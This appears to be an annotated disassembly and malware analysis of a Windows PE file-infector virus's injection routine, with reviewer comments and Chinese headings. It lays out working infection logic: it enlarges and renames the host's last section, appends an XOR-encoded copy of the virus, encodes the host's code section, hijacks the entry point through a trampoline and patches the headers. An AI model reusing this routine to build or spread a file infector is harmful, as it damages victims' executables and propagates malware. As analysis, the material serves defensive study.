.text:004014D1 mov eax, [edi+0Ch] ; VirtualAddress
.text:004014D4 add ss:image_base[ebp], eax ; image_base now = VA of the first section (used by start+38)
.text:004014DA mov eax, [edi+8] ; VirtualSize
.text:004014DD mov ss:virtualsize[ebp], eax ; used by start+40 and by the encode loop below
.text:004014E3 mov al, [edi]
.text:004014E5 mov ss:sectionname[ebp], al ; first byte of the section name (not used elsewhere in this listing)
.text:004014EB mov eax, [edi+24h] ; Characteristics
.text:004014EE or eax, 0A0000020h ; | MEM_WRITE | MEM_EXECUTE | CNT_CODE
.text:004014F3 mov [edi+24h], eax ; this is an OR, not an XOR: the first section is made writable so start can decode it in place
.text:004014F6
.text:004014F6 loc_4014F6: ; CODE XREF: inject+D4j
.text:004014F6 cmp [edi+14h], esi
.text:004014F9 jbe short loc_401500
.text:004014FB mov esi, [edi+14h] ; new highest PointerToRawData
.text:004014FE mov eax, edi ; remember that header
.text:00401500
.text:00401500 loc_401500: ; CODE XREF: inject+107j
.text:00401500 add edi, 28h ; sizeof(IMAGE_SECTION_HEADER)
.text:00401503 dec ecx
.text:00401504 jmp short loc_4014BE
.text:00401506 ; ---------------------------------------------------------------------------
.text:00401506
.text:00401506 loc_401506: ; CODE XREF: inject+D0j
.text:00401506 mov edi, eax ; edi = header of the section with the highest PointerToRawData (last in the file)
增加节注入病毒
.text:00401508 ; Despite the heading, no section header is added and NumberOfSections is
.text:00401508 ; not changed: the existing last section is renamed and enlarged.
.text:00401508 mov ebx, [edi+8] ; VirtualSize
.text:0040150B add ebx, 0B33h ; + stub + encoded body
.text:00401511 add ebx, 7 ; + trampoline (B8 imm32 FF D0)
.text:00401514 mov [edi+8], ebx ; new VirtualSize
.text:00401517 push edi
.text:00401518 lea eax, [edi]
.text:0040151A mov edi, eax
.text:0040151C mov al, 2Eh ; '.'
.text:0040151E stosb
.text:0040151F mov al, 74h ; 't'
.text:00401521 stosb
.text:00401522 mov al, 65h ; 'e'
.text:00401524 stosb
.text:00401525 mov al, 78h ; 'x'
.text:00401527 stosb
.text:00401528 mov al, 74h ; 't'
.text:0040152A stosb
.text:0040152B mov al, 0
.text:0040152D stosb
.text:0040152E pop edi ; section renamed ".text" (a second ".text" section is a visible artifact)
.text:0040152F xor edx, edx
.text:00401531 mov eax, ebx ; new VirtualSize
.text:00401533 mov ebx, ss:filealign[ebp]
.text:00401539 div ebx ; edx = new VirtualSize mod FileAlignment
.text:0040153B or edx, edx
.text:0040153D jnz short loc_401544 ; not aligned: round up below
.text:0040153F mov eax, [edi+8] ; already aligned: new SizeOfRawData = new VirtualSize
.text:00401542 jmp short loc_401565
.text:00401544 ; ---------------------------------------------------------------------------
.text:00401544
.text:00401544 loc_401544: ; CODE XREF: inject+14Bj
.text:00401544 mov eax, [edi+8] ; round the new VirtualSize up to a multiple of FileAlignment
.text:00401547 mov ebx, ss:filealign[ebp]
.text:0040154D push ebx
.text:0040154E xor ecx, ecx
.text:00401550 mov edx, eax ; this copy is never used
.text:00401552
.text:00401552 loc_401552: ; CODE XREF: inject:loc_40155Cj
.text:00401552 inc ecx ; ecx = log2(FileAlignment): shift right until zero
.text:00401553 shr ebx, 1
.text:00401555 or ebx, ebx
.text:00401557 jnz short loc_40155C
.text:00401559 dec ecx ; last shift went one too far
.text:0040155A jmp short loc_40155E
.text:0040155C ; ---------------------------------------------------------------------------
.text:0040155C
.text:0040155C loc_40155C: ; CODE XREF: inject+165j
.text:0040155C jmp short loc_401552
.text:0040155E ; ---------------------------------------------------------------------------
.text:0040155E
.text:0040155E loc_40155E: ; CODE XREF: inject+168j
.text:0040155E sar eax, cl ; clear the low log2(align) bits ...
.text:00401560 shl eax, cl ; ... = round down to the alignment
.text:00401562 pop ebx
.text:00401563 add eax, ebx ; + FileAlignment = round up (assumes a power-of-two alignment)
.text:00401565
.text:00401565 loc_401565: ; CODE XREF: inject+150j
.text:00401565 mov ebx, [edi+10h] ; old SizeOfRawData
.text:00401568 mov [edi+10h], eax ; new SizeOfRawData (aligned)
.text:0040156B sub eax, ebx ; raw-size growth
.text:0040156D shr eax, 0Ch
.text:00401570 shl eax, 0Ch ; rounded DOWN to a multiple of 1000h
.text:00401573 mov ss:dword_4018CC[ebp], eax ; amount added to SizeOfImage at inject+237
.text:00401573 ; NOTE(review): because the growth is rounded down, growth below 1000h adds
.text:00401573 ; nothing to SizeOfImage although VirtualSize grew by 0B3Ah; a host whose last
.text:00401573 ; section then runs past SizeOfImage would fail to load — confirm on a sample.
.text:00401579 mov eax, [edi+24h] ; Characteristics of the last section
.text:0040157C or eax, 0A0000020h ; | MEM_WRITE | MEM_EXECUTE | CNT_CODE (sets bits; nothing is "restored" here)
.text:00401581 mov [edi+24h], eax
.text:00401584 mov esi, [edi+0Ch] ; VirtualAddress
.text:00401587 add esi, [edi+8] ; + new VirtualSize
.text:0040158A sub esi, 0B33h
.text:00401590 sub esi, 7 ; - 0B3Ah = RVA of the section's original end
.text:00401593 push esi ; = RVA of the new entry point, popped at inject+227
.text:00401594 mov esi, [edi+14h] ; PointerToRawData
.text:00401597 add esi, [edi+8]
.text:0040159A sub esi, 0B33h
.text:004015A0 sub esi, 7 ; + old VirtualSize = file offset of the section's original end
.text:004015A3 mov edi, esi ; (relative to VirtualSize, not to the old SizeOfRawData)
.text:004015A5 add edi, ss:map_base[ebp] ; edi = write position inside the mapped file
.text:004015AB lea esi, start[ebp]
.text:004015B1 mov ecx, 32h ; copy the plaintext decoder stub (401030..401061)
.text:004015B6 rep movsb
.text:004015B8 lea esi, dword_401062[ebp] ; then the body, XOR-encoded
.text:004015BE mov ecx, 0B01h
.text:004015C3 mov bl, ss:byte_40165F[ebp] ; current key ...
.text:004015C9 inc bl ; ... + 1 = key for the new copy
.text:004015CB xor al, al
.text:004015CD mov ss:byte_40165F[ebp], al ; zero the slot before encoding so the copy's slot decodes to 0 (see start);
.text:004015CD ; the running image's slot stays 0 afterwards, so later victims in the same run get key 1
.text:004015D3
.text:004015D3 loc_4015D3: ; CODE XREF: inject+1ECj
.text:004015D3 or ecx, ecx ; for (i = 0; i < 0B01h; i++) *edi++ = body[i] ^ bl;
.text:004015D5 jnz short loc_4015D9
.text:004015D7 jmp short loc_4015E0
.text:004015D9 ; ---------------------------------------------------------------------------
.text:004015D9
解密
.text:004015D9 loc_4015D9: ; CODE XREF: inject+1E3j
.text:004015D9 lodsb
.text:004015DA xor al, bl ; XOR encode (symmetric with the decode loop in start)
.text:004015DC stosb
.text:004015DD dec ecx
.text:004015DE jmp short loc_4015D3
.text:004015E0 ; ---------------------------------------------------------------------------
.text:004015E0
.text:004015E0 loc_4015E0: ; CODE XREF: inject+1E5j
.text:004015E0 push edi ; end of the written body (trampoline goes here)
.text:004015E1 mov esi, ss:point_to_rawdata[ebp] ; first section's raw data ...
.text:004015E7 add esi, ss:map_base[ebp] ; ... in the mapped file
.text:004015ED mov edi, esi ; in place
.text:004015EF mov ecx, ss:virtualsize[ebp] ; count = VirtualSize, not SizeOfRawData: if VirtualSize is larger,
.text:004015EF ; the XOR runs past the section's raw bytes into whatever follows in the file
.text:004015F5
.text:004015F5 loc_4015F5: ; CODE XREF: inject+20Ej
.text:004015F5 or ecx, ecx ; for (i = 0; i < virtualsize; i++) first_section[i] ^= bl;
.text:004015F7 jnz short loc_4015FB
.text:004015F9 jmp short loc_401602
.text:004015FB ; ---------------------------------------------------------------------------
.text:004015FB
.text:004015FB loc_4015FB: ; CODE XREF: inject+205j
.text:004015FB lodsb
.text:004015FC xor al, bl
.text:004015FE stosb
.text:004015FF dec ecx
.text:00401600 jmp short loc_4015F5 ; XOR-encode the host's first section (start decodes it again at run time)
.text:00401602 ; ---------------------------------------------------------------------------
.text:00401602
.text:00401602 loc_401602: ; CODE XREF: inject+207j
.text:00401602 pop edi ; back to the end of the body
.text:00401603 mov al, 0B8h ; B8 imm32 = mov eax, imm32
.text:00401605 stosb
.text:00401606 mov eax, ss:entry_add[ebp] ; original entry point as an absolute VA
.text:0040160C stosd
.text:0040160D mov ax, 0D0FFh ; FF D0 = call eax
.text:00401611 stosw ; 7-byte trampoline: mov eax, <orig entry>; call eax
.text:00401611 ; NOTE(review): an absolute VA is wrong if the host is loaded at another base — confirm.
.text:00401613 mov edi, ss:option_header[ebp]
.text:00401619 pop eax ; RVA pushed at inject+1A1
.text:0040161A mov [edi+10h], eax ; AddressOfEntryPoint = the copied stub
.text:0040161D pop eax ; no matching push inside inject: this appears to pop inject's own
.text:0040161D ; return address, so the retn below returns to the caller of sub_40124E
.text:0040161D ; (into sub_40130A after its call) — confirm by tracing; if so only the
.text:0040161D ; first candidate in each directory is infected.
.text:0040161E mov ebx, [edi+38h] ; SizeOfImage
.text:00401621 mov eax, ss:dword_4018CC[ebp]
.text:00401627 add ebx, eax
.text:00401629 mov [edi+38h], ebx ; SizeOfImage += page-rounded raw growth
.text:0040162C mov eax, ss:map_base[ebp]
.text:00401632 push eax
.text:00401633 mov eax, ss:dword_4016FB[ebp]
.text:00401639 call eax ; (map_base) -> consistent with UnmapViewOfFile
.text:0040163B mov eax, ss:dword_4018A8[ebp]
.text:00401641 push eax
.text:00401642 mov eax, ss:dword_40170B[ebp]
.text:00401648 call eax ; (mapping handle) -> consistent with CloseHandle
.text:0040164A mov eax, ss:(dword_401899+3)[ebp]
.text:00401650 push eax
.text:00401651 mov eax, ss:dword_40170B[ebp]
.text:00401657 call eax ; (file handle) -> consistent with CloseHandle
.text:00401659 retn
.text:00401659 inject endp
.text:00401659